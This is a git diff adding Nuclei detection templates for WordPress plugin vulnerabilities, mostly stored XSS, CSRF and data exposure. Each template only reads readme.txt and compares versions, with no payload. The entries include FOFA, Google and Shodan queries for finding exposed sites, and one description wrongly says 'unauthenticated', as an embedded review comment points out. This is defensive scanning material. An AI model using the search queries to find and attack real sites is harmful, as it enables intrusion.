1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "import-eventbrite-events" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml b/poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml new file mode 100644 index 0000000000..854734c487 
--- /dev/null +++ b/poc/cve/CVE-2024-12446-2affa83d9110434c8964fc4fe186651f.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12446-2affa83d9110434c8964fc4fe186651f + +info: + name: > + Post to Pdf <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Post to Pdf plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gmptp_single_post' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2774e66c-2920-4578-9ab8-20d7dfd6bd6d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12446 + metadata: + fofa-query: "wp-content/plugins/post-to-pdf/" + google-query: inurl:"/wp-content/plugins/post-to-pdf/" + shodan-query: 'vuln:CVE-2024-12446' + tags: cve,wordpress,wp-plugin,post-to-pdf,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-to-pdf/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-to-pdf" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml b/poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml new file mode 100644 index 0000000000..70df7a4ae3 --- /dev/null +++ b/poc/cve/CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12447-f170b29c68bc4a2c96b04066f7af171d + +info: + name: > + Get Post Content Shortcode <= 0.4 - Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Information Disclosure via post_content Shortcode + author: topscoder + severity: low + description: > + The Get Post Content Shortcode plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 0.4 via the 'post-content' shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the content of password-protected, private, draft, and pending posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b92091-e615-484f-b402-2e793eed214d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12447 + metadata: + fofa-query: "wp-content/plugins/get-post-content-shortcode/" + google-query: inurl:"/wp-content/plugins/get-post-content-shortcode/" + shodan-query: 'vuln:CVE-2024-12447' + tags: cve,wordpress,wp-plugin,get-post-content-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/get-post-content-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "get-post-content-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml b/poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml new file mode 100644 index 0000000000..7aa5b7f437 --- /dev/null +++ b/poc/cve/CVE-2024-12448-b0024901f823c199e5df7414f136f048.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12448-b0024901f823c199e5df7414f136f048 + +info: + name: > + Posts and Products Views for WooCommerce <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Posts and Products Views for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'papvfwc_views' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a7e27a6c-8b14-459b-aba2-044f311edf9e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12448 + metadata: + fofa-query: "wp-content/plugins/posts-and-products-views/" + google-query: inurl:"/wp-content/plugins/posts-and-products-views/" + shodan-query: 'vuln:CVE-2024-12448' + tags: cve,wordpress,wp-plugin,posts-and-products-views,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/posts-and-products-views/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "posts-and-products-views" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml b/poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml new file mode 100644 index 0000000000..5b154a8026 --- /dev/null +++ b/poc/cve/CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12458-e6b90e547e05531a7e2ba9dd1b97c927 + +info: + name: > + Smart PopUp Blaster <= 1.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/afd7fe73-1f24-4e47-a0c4-5a08662c4dbe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12458 + metadata: + fofa-query: "wp-content/plugins/smart-popup-blaster/" + google-query: inurl:"/wp-content/plugins/smart-popup-blaster/" + shodan-query: 'vuln:CVE-2024-12458' + tags: cve,wordpress,wp-plugin,smart-popup-blaster,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smart-popup-blaster/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smart-popup-blaster" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.3') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml b/poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml new file mode 100644 index 0000000000..4cbd955545 --- /dev/null +++ b/poc/cve/CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12459-1c8f2c123589ae3f3e53f13d47253fcf + +info: + name: > + Ganohrs Toggle Shortcode <= 0.2.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Ganohrs Toggle Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'toggle' shortcode in all versions up to, and including, 0.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/efd49905-0f2c-44b7-85c6-c2b77440ac17?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12459 + metadata: + fofa-query: "wp-content/plugins/ganohrs-toggle-shortcode/" + google-query: inurl:"/wp-content/plugins/ganohrs-toggle-shortcode/" + shodan-query: 'vuln:CVE-2024-12459' + tags: cve,wordpress,wp-plugin,ganohrs-toggle-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ganohrs-toggle-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ganohrs-toggle-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.2.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12465.yaml b/poc/cve/CVE-2024-12465.yaml new file mode 100644 index 0000000000..d583917b96 --- /dev/null 
+++ b/poc/cve/CVE-2024-12465.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12465-cee6fb491f26feabdcf3dcaa9d9a88a9 + +info: + name: > + Property Hive Stamp Duty Calculator <= 1.0.22 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Property Hive Stamp Duty Calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stamp_duty_calculator_scotland' shortcode in all versions up to, and including, 1.0.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4f52cb6-eccf-4213-ae44-4a3fa738723d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12465 + metadata: + fofa-query: "wp-content/plugins/property-hive-stamp-duty-calculator/" + google-query: inurl:"/wp-content/plugins/property-hive-stamp-duty-calculator/" + shodan-query: 'vuln:CVE-2024-12465' + tags: cve,wordpress,wp-plugin,property-hive-stamp-duty-calculator,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/property-hive-stamp-duty-calculator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "property-hive-stamp-duty-calculator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.22') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml b/poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml new file mode 100644 index 0000000000..855526c63f --- /dev/null +++ b/poc/cve/CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12474-143276e3178f42c70ef45aed9f8f19ab + +info: + name: > + GeoDataSource Country Region DropDown <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The GeoDataSource Country Region DropDown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gds-country-dropdown' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c974726e-9371-40e5-8664-c12c8c06e5b9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12474 + metadata: + fofa-query: "wp-content/plugins/geodatasource-country-region-dropdown/" + google-query: inurl:"/wp-content/plugins/geodatasource-country-region-dropdown/" + shodan-query: 'vuln:CVE-2024-12474' + tags: cve,wordpress,wp-plugin,geodatasource-country-region-dropdown,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/geodatasource-country-region-dropdown/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "geodatasource-country-region-dropdown" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml b/poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml new file mode 100644 index 0000000000..35d99932c6 --- /dev/null +++ b/poc/cve/CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12501-c27faf539f1a53d9009e9c3a53602e7a + +info: + name: > + Simple Locator <= 2.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Simple Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38cb5e43-56d0-40b6-936a-f10f15d2e72f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12501 + metadata: + fofa-query: "wp-content/plugins/simple-locator/" + google-query: inurl:"/wp-content/plugins/simple-locator/" + shodan-query: 'vuln:CVE-2024-12501' + tags: cve,wordpress,wp-plugin,simple-locator,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml b/poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml new file mode 100644 index 0000000000..657df422e2 --- /dev/null 
+++ b/poc/cve/CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12502-1f199f73b33e699daa4c51027e49df2e + +info: + name: > + My IDX Home Search <= 2.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-landing' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12502 + metadata: + fofa-query: "wp-content/plugins/my-idx-home-search/" + google-query: inurl:"/wp-content/plugins/my-idx-home-search/" + shodan-query: 'vuln:CVE-2024-12502' + tags: cve,wordpress,wp-plugin,my-idx-home-search,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/my-idx-home-search/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "my-idx-home-search" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml b/poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml new file mode 100644 index 0000000000..625c9fc0a6 --- /dev/null +++ b/poc/cve/CVE-2024-12517-efd628a1954edd29546cb9041fe9b427.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12517-efd628a1954edd29546cb9041fe9b427 + +info: + name: > + WooCommerce Cart Count Shortcode <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WooCommerce Cart Count Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cart_button' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8373938c-060a-4579-a133-d25b4d065d36?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12517 + metadata: + fofa-query: "wp-content/plugins/woo-cart-count-shortcode/" + google-query: inurl:"/wp-content/plugins/woo-cart-count-shortcode/" + shodan-query: 'vuln:CVE-2024-12517' + tags: cve,wordpress,wp-plugin,woo-cart-count-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-cart-count-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-cart-count-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml b/poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml new file mode 100644 index 0000000000..945244c7c3 --- /dev/null +++ b/poc/cve/CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12523-3e0bf521f24a7f7e87f4a5a124f0141d + +info: + name: > + States Map US <= 2.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The States Map US plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'states_map' shortcode in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bdd07160-721b-4807-a227-72cd91faef39?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-12523 + metadata: + fofa-query: "wp-content/plugins/ymc-states-map/" + google-query: inurl:"/wp-content/plugins/ymc-states-map/" + shodan-query: 'vuln:CVE-2024-12523' + tags: cve,wordpress,wp-plugin,ymc-states-map,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ymc-states-map/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ymc-states-map" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml b/poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml new file mode 100644 index 0000000000..b715117539 --- /dev/null 
+++ b/poc/cve/CVE-2024-12555-5cbce38a9099186c24f323bfe5404451.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12555-5cbce38a9099186c24f323bfe5404451 + +info: + name: > + SIP Calculator <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The SIP Calculator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/03afffcc-02fe-4054-8876-6a4e4d9de071?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12555 + metadata: + fofa-query: "wp-content/plugins/sip-calculator/" + google-query: inurl:"/wp-content/plugins/sip-calculator/" + shodan-query: 'vuln:CVE-2024-12555' + tags: cve,wordpress,wp-plugin,sip-calculator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sip-calculator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sip-calculator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12572.yaml b/poc/cve/CVE-2024-12572.yaml new file mode 100644 index 0000000000..8b4355a15b --- /dev/null +++ b/poc/cve/CVE-2024-12572.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12572-99c5fc1f98bec101dce40530a6fa4801 + +info: + name: > + Hello in All Languages <= 1.0.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Hello In All Languages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/85501fc0-5d51-492b-b208-4b84f371ee77?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12572 + metadata: + fofa-query: "wp-content/plugins/hello-in-all-languages/" + google-query: inurl:"/wp-content/plugins/hello-in-all-languages/" + shodan-query: 'vuln:CVE-2024-12572' + tags: cve,wordpress,wp-plugin,hello-in-all-languages,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hello-in-all-languages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hello-in-all-languages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12574.yaml b/poc/cve/CVE-2024-12574.yaml new file mode 100644 index 0000000000..f2d88425e3 --- /dev/null +++ b/poc/cve/CVE-2024-12574.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12574-411e698a90aecedc46e74ff8fd9e6336 + +info: + name: > + SVG Shortcode <= 1.0.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG Upload + author: topscoder + severity: low + description: > + The SVG Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b378256-2d9b-4aad-abfe-fecfc76f0bb4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-12574 + metadata: + fofa-query: "wp-content/plugins/svg-shortcode/" + google-query: inurl:"/wp-content/plugins/svg-shortcode/" + shodan-query: 'vuln:CVE-2024-12574' + tags: cve,wordpress,wp-plugin,svg-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/svg-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "svg-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml b/poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml new file mode 100644 index 0000000000..038d2edaa3 --- /dev/null +++ b/poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml 
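Review bot: The `description` says the flaw can be used by "unauthenticated attackers", which contradicts both the `name` ("Authenticated (Author+)") and the `PR:L` component of `cvss-metrics` in the same `info` block. Anyone triaging from the description alone would overestimate exposure, since the other two fields say an author-level account is required. I would reword the clause to `authenticated attackers, with author-level access and above,` so the three fields agree. The wording is presumably inherited from the upstream advisory text, so the generator may need the correction rather than this one file.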
@@ -0,0 +1,59 @@ +id: CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3 + +info: + name: > + Tickera – WordPress Event Ticketing <= 3.5.4.8 - Unauthenticated Customer Data Exposure + author: topscoder + severity: medium + description: > + The Tickera – WordPress Event Ticketing plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.5.4.8 via the 'tickera_tickets_info' endpoint. This makes it possible for unauthenticated attackers to extract sensitive data from bookings like full names, email addresses, check-in/out timestamps and more. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2db29c12-bf8a-4d5a-b12a-6c74b816d5f0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-12578 + metadata: + fofa-query: "wp-content/plugins/tickera-event-ticketing-system/" + google-query: inurl:"/wp-content/plugins/tickera-event-ticketing-system/" + shodan-query: 'vuln:CVE-2024-12578' + tags: cve,wordpress,wp-plugin,tickera-event-ticketing-system,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tickera-event-ticketing-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + 